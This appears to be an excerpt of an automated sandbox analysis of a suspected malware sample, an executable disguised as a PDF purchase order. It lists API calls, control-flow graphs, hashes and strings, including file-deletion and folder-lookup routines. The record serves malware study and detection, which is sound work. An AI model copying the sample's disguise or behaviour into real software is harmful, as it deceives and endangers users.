                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                            • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                            • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                            • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                            APIs
                                                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4227406936-0
                                                                                                            • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                            • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 707 4060c4-4060cb 703->707 705 4060d0-4060dd 704->705 706 4062cf-4062da 704->706 705->706 710 4060e3-4060ef 705->710 708 4062e5-4062e6 706->708 709 4062dc-4062e0 call 406055 706->709 707->704 709->708 712 4062b0 710->712 713 4060f5-406131 710->713 714 4062b2-4062bc 712->714 715 4062be-4062c1 712->715 716 406251-406255 713->716 717 406137-406142 GetVersion 713->717 714->704 715->704 718 406257-40625b 716->718 719 40628a-40628e 716->719 720 406144-406148 717->720 721 40615c 717->721 722 40626b-406278 call 406055 718->722 723 40625d-406269 call 405f9c 718->723 725 406290-406298 call 406077 719->725 726 40629d-4062ae lstrlenW 719->726 720->721 727 40614a-40614e 720->727 724 406163-40616a 721->724 738 40627d-406286 722->738 723->738 730 40616c-40616e 724->730 731 40616f-406171 724->731 725->726 726->704 727->721 728 406150-406154 727->728 728->721 734 406156-40615a 728->734 730->731 736 406173-406199 call 405f22 731->736 737 4061ad-4061b0 731->737 734->724 748 406238-40623c 736->748 749 40619f-4061a8 call 406077 736->749 741 4061c0-4061c3 737->741 742 4061b2-4061be GetSystemDirectoryW 737->742 738->726 740 406288 738->740 744 406249-40624f call 4062e9 740->744 746 4061c5-4061d3 GetWindowsDirectoryW 741->746 747 40622e-406230 741->747 745 406232-406236 742->745 744->726 745->744 745->748 746->747 747->745 750 4061d5-4061df 747->750 748->744 755 40623e-406244 lstrcatW 748->755 749->745 752 4061e1-4061e4 750->752 753 4061f9-40620f SHGetSpecialFolderLocation 750->753 752->753 757 4061e6-4061ed 752->757 758 406211-406228 SHGetPathFromIDListW CoTaskMemFree 753->758 759 40622a 753->759 755->744 761 4061f5-4061f7 757->761 758->745 758->759 759->747 761->745 761->753
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-1230650788
                                                                                                            • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                            • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                            • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                            • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 777 4058b1-4058bc lstrcatW 769->777 778 4058be-4058bf call 405a55 769->778 770->767 774 4059b7-4059ba 770->774 771->769 771->770 775 4059c4-4059cc call 406398 774->775 776 4059bc-4059c2 774->776 775->767 786 4059ce-4059e2 call 405a09 call 4057fe 775->786 776->767 780 4058c4-4058c8 777->780 778->780 782 4058d4-4058da lstrcatW 780->782 783 4058ca-4058d2 780->783 785 4058df-4058fb lstrlenW FindFirstFileW 782->785 783->782 783->785 787 405901-405909 785->787 788 4059a5-4059a9 785->788 802 4059e4-4059e7 786->802 803 4059fa-4059fd call 4051b4 786->803 790 405929-40593d call 406055 787->790 791 40590b-405913 787->791 788->770 793 4059ab 788->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->787 801 40599e-40599f FindClose 795->801 798->790 798->795 801->788 802->776 807 4059e9-4059f8 call 4051b4 call 405ef6 802->807 803->767 813 405980-405983 call 4051b4 804->813 814 405961-405964 804->814 805->795 808 405949-405952 call 405846 805->808 807->767 808->795 813->795 817 405966-405976 call 4051b4 call 405ef6 814->817 818 405978-40597e 814->818 817->795 818->795
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 0040586F
                                                                                                            • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058B7
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058DA
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058E0
                                                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058F0
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                            Strings
                                                                                                            • \*.*, xrefs: 004058B1
                                                                                                            • "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 0040584F
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-3073260173
                                                                                                            • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                            • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                            • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                            • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 00402154
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi
                                                                                                            • API String ID: 542301482-4067767340
                                                                                                            • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                            • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                            • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                            • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                            • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                            • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                            • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                            • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                            • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                            • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                            • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                            • DestroyWindow.USER32 ref: 00403CAE
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282139019-0
                                                                                                            • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                            • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                            • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                            • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
